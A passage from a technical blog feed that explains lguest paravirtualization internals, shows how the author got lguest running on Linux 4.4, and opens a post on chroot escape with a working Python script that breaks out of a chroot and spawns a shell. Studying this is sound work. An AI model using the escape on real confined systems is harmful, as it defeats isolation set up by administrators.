‘return_to_host’ means the vector is a trap; ‘deliver_to_host’ means it is an external interrupt.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> IRQ_STUBS 0 1 return_to_host
// We'll say nothing, yet, about NMI
IRQ_STUB 2 handle_nmi
// Other traps also return to the Host
IRQ_STUBS 3 31 return_to_host
// All interrupts go via their handlers
IRQ_STUBS 32 127 deliver_to_host
// 'Cept system calls coming from userspace
// Are to go to the Guest, never the Host.
IRQ_STUB 128 return_to_host
IRQ_STUBS 129 255 deliver_to_host
</code></pre></div></div>
<p>When the guest kernel sets an interrupt table entry, for example through ‘set_intr_gate’, the pv op ‘lguest_write_idt_entry’ is called. It writes the entry into the guest’s own IDT and then issues a ‘LHCALL_LOAD_IDT_ENTRY’ hypercall, which lguest handles in ‘load_guest_idt_entry’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void set_trap(struct lg_cpu *cpu, struct desc_struct *trap,
unsigned int num, u32 lo, u32 hi)
{
u8 type = idt_type(lo, hi);
/* We zero-out a not-present entry */
if (!idt_present(lo, hi)) {
trap->a = trap->b = 0;
return;
}
/* We only support interrupt and trap gates. */
if (type != 0xE && type != 0xF)
kill_guest(cpu, "bad IDT type %i", type);
/*
* We only copy the handler address, present bit, privilege level and
* type. The privilege level controls where the trap can be triggered
* manually with an "int" instruction. This is usually GUEST_PL,
* except for system calls which userspace can use.
*/
trap->a = ((__KERNEL_CS|GUEST_PL)<<16) | (lo&0x0000FFFF);
trap->b = (hi&0xFFFFEF00);
}
void load_guest_idt_entry(struct lg_cpu *cpu, unsigned int num, u32 lo, u32 hi)
{
/*
* Guest never handles: NMI, doublefault, spurious interrupt or
* hypercall. We ignore when it tries to set them.
*/
if (num == 2 || num == 8 || num == 15 || num == LGUEST_TRAP_ENTRY)
return;
/*
* Mark the IDT as changed: next time the Guest runs we'll know we have
* to copy this again.
*/
cpu->changed |= CHANGED_IDT;
/* Check that the Guest doesn't try to step outside the bounds. */
if (num >= ARRAY_SIZE(cpu->arch.idt))
kill_guest(cpu, "Setting idt entry %u", num);
else
set_trap(cpu, &cpu->arch.idt[num], num, lo, hi);
}
</code></pre></div></div>
<p>The guest’s IDT settings are stored in ‘cpu->arch.idt’. ‘load_guest_idt_entry’ marks ‘cpu->changed’ with ‘CHANGED_IDT’ and then calls ‘set_trap’. The guest is only allowed to install certain interrupt and trap gates.</p>
<p>‘run_guest_once’ calls ‘copy_in_guest_info’, which checks ‘cpu->changed’; if CHANGED_IDT is set, it calls ‘copy_traps’. This function copies the ‘direct traps’ from ‘cpu->arch.idt[]’ into ‘pages->state.guest_idt’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void copy_in_guest_info(struct lg_cpu *cpu, struct lguest_pages *pages)
{
...
if (cpu->changed & CHANGED_IDT)
copy_traps(cpu, pages->state.guest_idt, default_idt_entries);
...
}
void copy_traps(const struct lg_cpu *cpu, struct desc_struct *idt,
const unsigned long *def)
{
unsigned int i;
/*
* We can simply copy the direct traps, otherwise we use the default
* ones in the Switcher: they will return to the Host.
*/
for (i = 0; i < ARRAY_SIZE(cpu->arch.idt); i++) {
const struct desc_struct *gidt = &cpu->arch.idt[i];
/* If no Guest can ever override this trap, leave it alone. */
if (!direct_trap(i))
continue;
/*
* Only trap gates (type 15) can go direct to the Guest.
* Interrupt gates (type 14) disable interrupts as they are
* entered, which we never let the Guest do. Not present
* entries (type 0x0) also can't go direct, of course.
*
* If it can't go direct, we still need to copy the priv. level:
* they might want to give userspace access to a software
* interrupt.
*/
if (idt_type(gidt->a, gidt->b) == 0xF)
idt[i] = *gidt;
else
default_idt_entry(&idt[i], i, def[i], gidt);
}
}
static bool direct_trap(unsigned int num)
{
/*
* Hardware interrupts don't go to the Guest at all (except system
* call).
*/
if (num >= FIRST_EXTERNAL_VECTOR && !could_be_syscall(num))
return false;
/*
* The Host needs to see page faults (for shadow paging and to save the
* fault address), general protection faults (in/out emulation) and
* device not available (TS handling) and of course, the hypercall trap.
*/
return num != 14 && num != 13 && num != 7 && num != LGUEST_TRAP_ENTRY;
}
</code></pre></div></div>
<p>After some debugging, I found that only 0x80 (the syscall trap) can be installed directly by the guest.</p>
<p><img src="/assets/img/lguestinternals/12.png" alt="" /></p>
<p>When the host switches to the guest (switch_to_guest), lidt loads the lguest_pages IDT descriptor, which points to the lguest_pages’ state.guest_idt.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> lidt LGUEST_PAGES_guest_idt_desc(%eax)
</code></pre></div></div>
<h3> External interrupt </h3>
<p>When the physical CPU receives an interrupt, it first traps to the host and one of the following stubs is invoked, mostly ‘deliver_to_host’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> IRQ_STUBS 32 127 deliver_to_host
// 'Cept system calls coming from userspace
// Are to go to the Guest, never the Host.
IRQ_STUB 128 return_to_host
IRQ_STUBS 129 255 deliver_to_host
</code></pre></div></div>
<p>‘deliver_to_host’ first restores the host context by calling ‘SWITCH_TO_HOST’, then finds the interrupt handler and jumps to it. The stack has already been laid out by the interrupt and by ‘SWITCH_TO_HOST’, so when the handler finishes, its iret returns to the right address and host code continues running.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> deliver_to_host:
SWITCH_TO_HOST
// But now we must go home via that place
// Where that interrupt was supposed to go
// Had we not been ensconced, running the Guest.
// Here we see the trickness of run_guest_once():
// The Host stack is formed like an interrupt
// With EIP, CS and EFLAGS layered.
// Interrupt handlers end with "iret"
// And that will take us home at long long last.
// But first we must find the handler to call!
// The IDT descriptor for the Host
// Has two bytes for size, and four for address:
// %edx will hold it for us for now.
movl (LGUEST_PAGES_host_idt_desc+2)(%eax), %edx
// We now know the table address we need,
// And saved the trap's number inside %ebx.
// Yet the pointer to the handler is smeared
// Across the bits of the table entry.
// What oracle can tell us how to extract
// From such a convoluted encoding?
// I consulted gcc, and it gave
// These instructions, which I gladly credit:
leal (%edx,%ebx,8), %eax
movzwl (%eax),%edx
movl 4(%eax), %eax
xorw %ax, %ax
orl %eax, %edx
// Now the address of the handler's in %edx
// We call it now: its "iret" drops us home.
jmp *%edx
</code></pre></div></div>
<h3> Virtual device interrupt </h3>
<p>When the lguest userspace tool wants to notify the guest, for example about received packets or console input, it triggers an interrupt by calling ‘trigger_irq’. This function writes the irq information to /dev/lguest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void trigger_irq(struct virtqueue *vq)
{
unsigned long buf[] = { LHREQ_IRQ, vq->dev->config.irq_line };
...
/* Send the Guest an interrupt tell them we used something up. */
if (write(lguest_fd, buf, sizeof(buf)) != 0)
err(1, "Triggering irq %i", vq->dev->config.irq_line);
}
</code></pre></div></div>
<p>The lg module calls ‘user_send_irq’ to handle this request. It calls ‘set_interrupt’ to set a bit in ‘cpu->irqs_pending’ and then wakes up the process running the guest cpu.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static ssize_t write(struct file *file, const char __user *in,
size_t size, loff_t *off)
{
...
switch (req) {
case LHREQ_INITIALIZE:
return initialize(file, input);
case LHREQ_IRQ:
return user_send_irq(cpu, input);
case LHREQ_GETREG:
return getreg_setup(cpu, input);
case LHREQ_SETREG:
return setreg(cpu, input);
case LHREQ_TRAP:
return trap(cpu, input);
default:
return -EINVAL;
}
}
void set_interrupt(struct lg_cpu *cpu, unsigned int irq)
{
/*
* Next time the Guest runs, the core code will see if it can deliver
* this interrupt.
*/
set_bit(irq, cpu->irqs_pending);
/*
* Make sure it sees it; it might be asleep (eg. halted), or running
* the Guest right now, in which case kick_process() will knock it out.
*/
if (!wake_up_process(cpu->tsk))
kick_process(cpu->tsk);
}
</code></pre></div></div>
<p>‘run_guest’ calls ‘interrupt_pending’ to check whether there are pending interrupts and calls ‘try_deliver_interrupt’ to handle them.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> irq = interrupt_pending(cpu, &more);
if (irq < LGUEST_IRQS)
try_deliver_interrupt(cpu, irq, more);
</code></pre></div></div>
<h3> Guest trap </h3>
<p>If the guest triggers a trap, for example because it hasn’t set up page tables for a memory access, execution first traps to the host and ‘return_to_host’ is invoked.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> IRQ_STUBS 0 1 return_to_host
// We'll say nothing, yet, about NMI
IRQ_STUB 2 handle_nmi
// Other traps also return to the Host
IRQ_STUBS 3 31 return_to_host
</code></pre></div></div>
<p>‘return_to_host’ is just ‘SWITCH_TO_HOST’ plus ‘iret’, which returns to the point in ‘run_guest_once’ that runs the guest code.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> return_to_host:
SWITCH_TO_HOST
iret
</code></pre></div></div>
<p>SWITCH_TO_HOST sets ‘cpu->regs->trapnum’. After the ‘iret’, ‘lguest_arch_handle_trap’ is called to handle the guest trap. If the trap belongs to the guest, ‘deliver_trap’ is called to deliver the interrupt to the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int run_guest(struct lg_cpu *cpu, unsigned long __user *user)
{
...
/* We stop running once the Guest is dead. */
while (!cpu->lg->dead) {
unsigned int irq;
bool more;
/* First we run any hypercalls the Guest wants done. */
if (cpu->hcall)
do_hypercalls(cpu);
...
...
irq = interrupt_pending(cpu, &more);
if (irq < LGUEST_IRQS)
try_deliver_interrupt(cpu, irq, more);
...
local_irq_disable();
/* Actually run the Guest until something happens. */
lguest_arch_run_guest(cpu);
/* Now we're ready to be interrupted or moved to other CPUs */
local_irq_enable();
/* Now we deal with whatever happened to the Guest. */
lguest_arch_handle_trap(cpu);
}
...
}
</code></pre></div></div>
<p>‘push_guest_interrupt_stack’ pushes the guest state onto the guest stack, and ‘guest_run_interrupt’ changes eip to point at the interrupt handler. When guest code next runs, it starts in the guest’s interrupt handler.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bool deliver_trap(struct lg_cpu *cpu, unsigned int num)
{
/*
* Trap numbers are always 8 bit, but we set an impossible trap number
* for traps inside the Switcher, so check that here.
*/
if (num >= ARRAY_SIZE(cpu->arch.idt))
return false;
/*
* Early on the Guest hasn't set the IDT entries (or maybe it put a
* bogus one in): if we fail here, the Guest will be killed.
*/
if (!idt_present(cpu->arch.idt[num].a, cpu->arch.idt[num].b))
return false;
push_guest_interrupt_stack(cpu, has_err(num));
guest_run_interrupt(cpu, cpu->arch.idt[num].a,
cpu->arch.idt[num].b);
return true;
}
static void guest_run_interrupt(struct lg_cpu *cpu, u32 lo, u32 hi)
{
/* If we're already in the kernel, we don't change stacks. */
if ((cpu->regs->ss&0x3) != GUEST_PL)
cpu->regs->ss = cpu->esp1;
/*
* Set the code segment and the address to execute.
*/
cpu->regs->cs = (__KERNEL_CS|GUEST_PL);
cpu->regs->eip = idt_address(lo, hi);
/*
* Trapping always clears these flags:
* TF: Trap flag
* VM: Virtual 8086 mode
* RF: Resume
* NT: Nested task.
*/
cpu->regs->eflags &=
~(X86_EFLAGS_TF|X86_EFLAGS_VM|X86_EFLAGS_RF|X86_EFLAGS_NT);
/*
* There are two kinds of interrupt handlers: 0xE is an "interrupt
* gate" which expects interrupts to be disabled on entry.
*/
if (idt_type(lo, hi) == 0xE)
if (put_user(0, &cpu->lg->lguest_data->irq_enabled))
kill_guest(cpu, "Disabling interrupts");
}
</code></pre></div></div>
<h3> Direct trap </h3>
<p>Returning to the host on every trap, calling deliver_trap and re-entering the guest is slow. So lguest can set up the IDT so that the CPU executes the guest interrupt handler directly, with no lguest involvement. When the guest sets an interrupt gate, lguest checks whether the setting is allowed; only a few vectors, such as the system call, may be set this way. When such an interrupt is triggered, the guest kernel jumps straight to the handler it installed, just as if there were no hypervisor.</p>
<h2> Device virtualization </h2>
<p>lguest supports only the basic virtio devices: net, block, console and rng. The device memory space is located right after the guest’s normal memory. Every device is a virtio device attached to the PCI host bridge, and all of them are kept in the global variable ‘devices’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct device_list {
/* Counter to assign interrupt numbers. */
unsigned int next_irq;
/* Counter to print out convenient device numbers. */
unsigned int device_num;
/* PCI devices. */
struct device *pci[MAX_PCI_DEVICES];
};
/* The list of Guest devices, based on command line arguments. */
static struct device_list devices;
</code></pre></div></div>
<p>Let’s take the console device as an example. ‘new_pci_device’ creates the PCI device, ‘add_pci_virtqueue’ sets the input/output handlers of the virtqueues, and ‘add_pci_feature’ adds a device feature.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void setup_console(void)
{
struct device *dev;
struct virtio_console_config conf;
/* If we can save the initial standard input settings... */
if (tcgetattr(STDIN_FILENO, &orig_term) == 0) {
struct termios term = orig_term;
/*
* Then we turn off echo, line buffering and ^C etc: We want a
* raw input stream to the Guest.
*/
term.c_lflag &= ~(ISIG|ICANON|ECHO);
tcsetattr(STDIN_FILENO, TCSANOW, &term);
}
dev = new_pci_device("console", VIRTIO_ID_CONSOLE, 0x07, 0x00);
/* We store the console state in dev->priv, and initialize it. */
dev->priv = malloc(sizeof(struct console_abort));
((struct console_abort *)dev->priv)->count = 0;
/*
* The console needs two virtqueues: the input then the output. When
* they put something the input queue, we make sure we're listening to
* stdin. When they put something in the output queue, we write it to
* stdout.
*/
add_pci_virtqueue(dev, console_input, "input");
add_pci_virtqueue(dev, console_output, "output");
/* We need a configuration area for the emerg_wr early writes. */
add_pci_feature(dev, VIRTIO_CONSOLE_F_EMERG_WRITE);
set_device_config(dev, &conf, sizeof(conf));
verbose("device %u: console\n", devices.device_num);
}
</code></pre></div></div>
<p>When lguest receives data, ‘console_input’ is called; when the guest kernel writes data to the console, ‘console_output’ is called.</p>
<p>How does the guest kernel find and enumerate these PCI devices?
When the guest enumerates the PCI bus, it accesses the PCI_CONFIG_ADDR (0xcf8) and PCI_CONFIG_DATA (0xcfc) ports. These accesses are delivered to lguest userspace, and ‘emulate_insn’ tries to emulate them.</p>
<p>When the port is PCI_CONFIG_ADDR or PCI_CONFIG_DATA, it calls the corresponding PCI function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void emulate_insn(const u8 insn[])
{
unsigned long args[] = { LHREQ_TRAP, 13 };
unsigned int insnlen = 0, in = 0, small_operand = 0, byte_access;
unsigned int eax, port, mask;
...
eax = getreg(eax);
if (in) {
/* This is the PS/2 keyboard status; 1 means ready for output */
if (port == 0x64)
val = 1;
else if (is_pci_addr_port(port))
pci_addr_ioread(port, mask, &val);
else if (is_pci_data_port(port))
pci_data_ioread(port, mask, &val);
/* Clear the bits we're about to read */
eax &= ~mask;
/* Copy bits in from val. */
eax |= val & mask;
/* Now update the register. */
setreg(eax, eax);
} else {
if (is_pci_addr_port(port)) {
if (!pci_addr_iowrite(port, mask, eax))
goto bad_io;
} else if (is_pci_data_port(port)) {
if (!pci_data_iowrite(port, mask, eax))
goto bad_io;
}
/* There are many other ports, eg. CMOS clock, serial
* and parallel ports, so we ignore them all. */
}
...
}
</code></pre></div></div>
<p>For example, when the guest triggers a ‘pci_data_ioread’, lguest finds the PCI device and returns the data to the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void pci_data_ioread(u16 port, u32 mask, u32 *val)
{
u32 reg;
struct device *d = dev_and_reg(&reg);
if (!d)
return;
/* Read through the PCI MMIO access window is special */
if (&d->config_words[reg] == &d->config.cfg_access.pci_cfg_data) {
u32 read_mask;
/*
* 4.1.4.7.1:
*
* Upon detecting driver read access to pci_cfg_data, the
* device MUST execute a read access of length cap.length at
* offset cap.offset at BAR selected by cap.bar and store the
* first cap.length bytes in pci_cfg_data.
*/
/* Must be bar 0 */
if (!valid_bar_access(d, &d->config.cfg_access))
bad_driver(d,
"Invalid cfg_access to bar%u, offset %u len %u",
d->config.cfg_access.cap.bar,
d->config.cfg_access.cap.offset,
d->config.cfg_access.cap.length);
/*
* Read into the window. The mask we use is set by
* len, *not* this read!
*/
read_mask = (1ULL<<(8*d->config.cfg_access.cap.length))-1;
d->config.cfg_access.pci_cfg_data
= emulate_mmio_read(d,
d->config.cfg_access.cap.offset,
read_mask);
verbose("Window read %#x/%#x from bar %u, offset %u len %u\n",
d->config.cfg_access.pci_cfg_data, read_mask,
d->config.cfg_access.cap.bar,
d->config.cfg_access.cap.offset,
d->config.cfg_access.cap.length);
}
ioread(port - PCI_CONFIG_DATA, d->config_words[reg], mask, val);
}
</code></pre></div></div>
<p>When the guest accesses a device’s MMIO address, it triggers a page fault trap. This is delivered to userspace, and the lguest tool emulates the access.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __attribute__((noreturn)) run_guest(void)
{
for (;;) {
struct lguest_pending notify;
int readval;
/* We read from the /dev/lguest device to run the Guest. */
readval = pread(lguest_fd, &notify, sizeof(notify), cpu_id);
if (readval == sizeof(notify)) {
if (notify.trap == 13) {
verbose("Emulating instruction at %#x\n",
getreg(eip));
emulate_insn(notify.insn);
} else if (notify.trap == 14) {
verbose("Emulating MMIO at %#x\n",
getreg(eip));
emulate_mmio(notify.addr, notify.insn);
} else
errx(1, "Unknown trap %i addr %#08x\n",
notify.trap, notify.addr);
/* ENOENT means the Guest died. Reading tells us why. */
} else if (errno == ENOENT) {
char reason[1024] = { 0 };
pread(lguest_fd, reason, sizeof(reason)-1, cpu_id);
errx(1, "%s", reason);
/* ERESTART means that we need to reboot the guest */
} else if (errno == ERESTART) {
restart_guest();
/* Anything else means a bug or incompatible change. */
} else
err(1, "Running guest failed");
}
}
</code></pre></div></div>
<h2> Guest Time </h2>
<p>The guest’s wall clock is read from ‘cpu->lg->lguest_data->time’. At initialization and on every interrupt injection, ‘write_timestamp’ is called to update it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void write_timestamp(struct lg_cpu *cpu)
{
struct timespec now;
ktime_get_real_ts(&now);
if (copy_to_user(&cpu->lg->lguest_data->time,
&now, sizeof(struct timespec)))
kill_guest(cpu, "Writing timestamp");
}
</code></pre></div></div>
<p>lguest implements several timer-related callbacks. The first is ‘x86_init.timers.timer_init’.
The most important function is the ‘set_next_event’ of ‘lguest_clockevent’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> x86_init.timers.timer_init = lguest_time_init;
static void lguest_time_init(void)
{
/* Set up the timer interrupt (0) to go to our simple timer routine */
if (lguest_setup_irq(0) != 0)
panic("Could not set up timer irq");
irq_set_handler(0, lguest_time_irq);
clocksource_register_hz(&lguest_clock, NSEC_PER_SEC);
/* We can't set cpumask in the initializer: damn C limitations! Set it
* here and register our timer device. */
lguest_clockevent.cpumask = cpumask_of(0);
clockevents_register_device(&lguest_clockevent);
/* Finally, we unblock the timer interrupt. */
clear_bit(0, lguest_data.blocked_interrupts);
}
static struct clock_event_device lguest_clockevent = {
.name = "lguest",
.features = CLOCK_EVT_FEAT_ONESHOT,
.set_next_event = lguest_clockevent_set_next_event,
.set_state_shutdown = lguest_clockevent_shutdown,
.rating = INT_MAX,
.mult = 1,
.shift = 0,
.min_delta_ns = LG_CLOCK_MIN_DELTA,
.max_delta_ns = LG_CLOCK_MAX_DELTA,
};
static int lguest_clockevent_set_next_event(unsigned long delta,
struct clock_event_device *evt)
{
/* FIXME: I don't think this can ever happen, but James tells me he had
* to put this code in. Maybe we should remove it now. Anyone? */
if (delta < LG_CLOCK_MIN_DELTA) {
if (printk_ratelimit())
printk(KERN_DEBUG "%s: small delta %lu ns\n",
__func__, delta);
return -ETIME;
}
/* Please wake us this far in the future. */
hcall(LHCALL_SET_CLOCKEVENT, delta, 0, 0, 0);
return 0;
}
</code></pre></div></div>
<p>When the timer subsystem invokes this callback, a LHCALL_SET_CLOCKEVENT hypercall is issued. ‘guest_set_clockevent’ handles it: it simply starts an hrtimer, and when the timer fires, a timer interrupt (irq 0) is injected into the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void guest_set_clockevent(struct lg_cpu *cpu, unsigned long delta)
{
ktime_t expires;
if (unlikely(delta == 0)) {
/* Clock event device is shutting down. */
hrtimer_cancel(&cpu->hrt);
return;
}
/*
* We use wallclock time here, so the Guest might not be running for
* all the time between now and the timer interrupt it asked for. This
* is almost always the right thing to do.
*/
expires = ktime_add_ns(ktime_get_real(), delta);
hrtimer_start(&cpu->hrt, expires, HRTIMER_MODE_ABS);
}
/* This is the function called when the Guest's timer expires. */
static enum hrtimer_restart clockdev_fn(struct hrtimer *timer)
{
struct lg_cpu *cpu = container_of(timer, struct lg_cpu, hrt);
/* Remember the first interrupt is the timer interrupt. */
set_interrupt(cpu, 0);
return HRTIMER_NORESTART;
}
/* This sets up the timer for this Guest. */
void init_clockdev(struct lg_cpu *cpu)
{
hrtimer_init(&cpu->hrt, CLOCK_REALTIME, HRTIMER_MODE_ABS);
cpu->hrt.function = clockdev_fn;
}
</code></pre></div></div>
<h2> Summary </h2>
<p>lguest is a paravirtualization solution that can run virtual machines without hardware support. The guest kernel needs to be modified to run under lguest.</p>
<p>For CPU virtualization, lguest maps the switcher code into both guest and host at the same virtual address. The switcher is used to switch between guest and host.</p>
<p>For memory virtualization, it uses shadow page tables, which translate from gva to hpa. This is where most of the performance overhead comes from.</p>
<p>For device virtualization, lguest implements devices in the lguest userspace tool, intercepting the PCI IO port accesses and managing the PCI devices. All supported devices are virtio devices.</p>
<p>There is no interrupt controller such as an APIC or IOAPIC. Device interrupts are injected by adjusting the guest’s eip before running guest code, and guest traps are intercepted by lguest.</p>
Run lguest on Linux kernel 4.42024-09-08T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2024/09/08/lguest-44
<h2> Background </h2>
<p>Recently, I am preparing to study the <a href="https://github.com/virt-pvm">PVM solution</a> proposed by the Linux kernel expert Lai Jiangshan. After a brief review of the paper and the patch, I found that it needs a deep understanding of paravirtualization to understand it. When I entered the field of virtualization, KVM had already dominated the virtualization field, so I did not study the implementation of paravirtualization solutions like lguest/xen from a code perspective at that time. In order to learn PVM, I must gain a more thorough understanding of lguest and xen.</p>
<p>lguest is the simplest paravirtualization solution, which is very suitable for learning. It was integrated into the Linux kernel in version 2.6.23 and removed in version 4.14. With the spirit of “true engineers get their hands dirty,” I am ready to run lguest right away. Of course, it is not surprising that, following the documentation, I began to set up the environment and then encountered failures, which is typical for open-source projects. This article records the problems I encountered and how I resolved them. I hope it can provide some help to the people in the field of virtualization.</p>
<h2> The issue </h2>
<p>I create a VirtualBox VM and install Ubuntu 16.04 in it. I choose Ubuntu 16.04 because it ships with a 4.4 kernel and is an LTS release.
In order to run lguest, we need to prepare the following:</p>
<ul>
<li>Prepare the host kernel (with the lg module) and the guest kernel</li>
<li>The initrd file and the rootfs file</li>
<li>Build the lguest userspace tool (the QEMU counterpart)</li>
</ul>
<h3> Build kernel </h3>
<p>I download the Linux kernel 4.4 source code, since Ubuntu 16.04 ships with a 4.4 kernel.
Following the <a href="http://lguest.ozlabs.org/lguest.txt">instructions</a>, I build the same kernel for both guest and host. Some of the configuration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ## CONFIG_EXPERIMENTAL=y // no available
CONFIG_PARAVIRT=y
CONFIG_LGUEST_GUEST=y
CONFIG_HIGHMEM64G=n
CONFIG_PHYSICAL_ALIGN=0x100000
CONFIG_VIRTIO_BLK=m
CONFIG_VIRTIO_NET=m
CONFIG_TUN=m
CONFIG_LGUEST=m
</code></pre></div></div>
<h3> Download initrd and rootfs file </h3>
<p>I download the initrd from <a href="https://download.libvirt.org/CIM/extras/initrd-1.1-i386.img">here</a>
and the rootfs from <a href="https://fs.devloop.org.uk/filesystems/CentOS-6.x/CentOS6.x-x86-root_fs.bz2">here</a>.</p>
<h3> Run it </h3>
<p>In the Linux kernel source tree, under tools/lguest, type ‘make’ to build the lguest userspace tool. Use the following command to run lguest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> modprobe lg
./lguest 64m /home/test/linux-4.4/vmlinux --tunnet=192.168.19.1 --initrd=/home/test/lguest/initrd-1.1-i386.img --block=/home/test/lguest/CentOS6.x-x86-root_fs root=/etc/vda
</code></pre></div></div>
<p><img src="/assets/img/lguest44/1.png" alt="" /></p>
<p>As we can see we get an error “lguest: Reinjecting trap 13 for fault at 0x1afaeaa: Invalid argument”.</p>
<h2> The solution </h2>
<h3> First issue: general protection fault </h3>
<p>After reading the code, I know this is a general protection fault raised by the guest; when it is dispatched to lguest, lguest can’t emulate the instruction and so reports this error.
Let’s first print the instruction. Add the following printf to the lguest.c file.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> default:
/* OK, we don't know what this is, can't emulate. */
printf("can't emulate:%x %x %x\n", insn[0], insn[1], insn[2]);
goto no_emulate;
}
</code></pre></div></div>
<p><img src="/assets/img/lguest44/2.png" alt="" /></p>
<p>Let’s disassemble vmlinux binary and find where this instruction comes.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@test-VirtualBox:~/lguest# objdump -S /home/test/linux-4.4/vmlinux > vmlinux1.S
root@test-VirtualBox:~/lguest# cat vmlinux1.S | grep "65 a1 14" | grep afaeaa
c1afaeaa: 65 a1 14 00 00 00 mov %gs:0x14,%eax
</code></pre></div></div>
<p>It’s the prologue of the function ‘load_ucode_intel_bsp’. The faulting instruction is ‘mov %gs:0x14,%eax’.</p>
<p><img src="/assets/img/lguest44/3.png" alt="" /></p>
<p>After some investigation, I learned that this instruction comes from the ‘stack protector’ feature. So I just build another kernel without stack canaries.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> make "KCFLAGS=-fno-stack-protector" -j6
</code></pre></div></div>
<p>After building, let’s try.</p>
<p><img src="/assets/img/lguest44/4.png" alt="" /></p>
<h3> Second issue: rdmsr </h3>
<p>Another issue. Let’s just go to 0x1034c25 to see what it is.</p>
<p><img src="/assets/img/lguest44/5.png" alt="" /></p>
<p>It’s the ‘rdmsr’ instruction, which is 2 bytes long. Let’s just ignore it. Add the following code to lguest.c.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (insn[insnlen] == 0x0f) {
insnlen = 2;
printf("ignore readmsr\n");
goto skip_insn;
}
</code></pre></div></div>
<p>After this patch, we finally run lguest successfully.</p>
<p><img src="/assets/img/lguest44/6.png" alt="" /></p>
<p><img src="/assets/img/lguest44/7.png" alt="" /></p>
<p>The rdmsr instruction is also called from ‘load_ucode_bsp’ call chain.</p>
<p><img src="/assets/img/lguest44/8.png" alt="" /></p>
<h2> Analysis </h2>
<p>There are two questions I don’t understand currently.</p>
<ul>
<li>why the ‘mov %gs:0x14,%eax’ instruction causes a gpf</li>
<li>why the guest uses native_rdmsr instead of the pv rdmsr, since ‘rdmsr’ is a privileged instruction</li>
</ul>
<p>For the first issue I read the SDM and found the clue in Volume 2, Chapter 4.3, Instructions (M-U), in the MOV-Move part:</p>
<p><img src="/assets/img/lguest44/9.png" alt="" /></p>
<p>And in the function ‘lguest_arch_setup_regs’, only ‘cs/ds/es/ss’ are initialized; ‘gs’ is not.</p>
<p><img src="/assets/img/lguest44/10.png" alt="" /></p>
<p>For the second issue, the reason became clear after looking at ‘load_ucode_bsp’.</p>
<p><img src="/assets/img/lguest44/11.png" alt="" /></p>
<p>Here ‘call load_ucode_bsp’ is issued from the kernel entry point (startup_32), before lguest initialization (lguest_init). When ‘load_ucode_bsp’ runs, the gs segment is not yet initialized, which causes the gpf. This code path also invokes ‘native_rdmsr’ directly, executing the ‘rdmsr’ instruction, which causes the second issue.</p>
<p>Note that we can eliminate this function by setting CONFIG_MICROCODE=n. I have tried this, and it works without modifying any lguest code.</p>
The anatomy of chroot escape2024-05-25T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2024/05/25/chroot-escape
<p>Recently I read about the old chroot escape techniques on Linux: using two chroot syscalls, a process can escape a chroot environment. I found no detailed article describing how it works underneath, so I wrote this post.</p>
<h3> Reproduce </h3>
<p>This part shows how we can escape the chroot environment. First let’s create a rootfs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@test-VirtualBox:/tmp# mkdir chroottest
root@test-VirtualBox:/tmp# cd chroottest/
root@test-VirtualBox:/tmp/chroottest# ls
root@test-VirtualBox:/tmp/chroottest# mkdir usr
root@test-VirtualBox:/tmp/chroottest# mount --bind /usr usr
root@test-VirtualBox:/tmp/chroottest# ln -s usr/lib lib
root@test-VirtualBox:/tmp/chroottest# ln -s usr/lib64 lib64
root@test-VirtualBox:/tmp/chroottest# ln -s usr/bin bin
root@test-VirtualBox:/tmp/chroottest# chroot .
bash-5.0# ls /
bin lib lib64 usr
bash-5.0# exit
exit
root@test-VirtualBox:/tmp/chroottest#
</code></pre></div></div>
<p>Create a test.py file in this rootfs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> import os
if not os.path.exists("chroot"):
    os.mkdir("chroot")
os.chroot("chroot")
os.chdir("../../../../../../..")
os.chroot(".")
os.system("/bin/sh")
</code></pre></div></div>
<p>Execute this test.py in the chroot environment. Then we can see we have escaped from the chroot environment.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@test-VirtualBox:/tmp/chroottest# ls
bin lib lib64 test.py usr
root@test-VirtualBox:/tmp/chroottest# chroot .
bash-5.0# ls /
bin lib lib64 test.py usr
bash-5.0# python3 /test.py
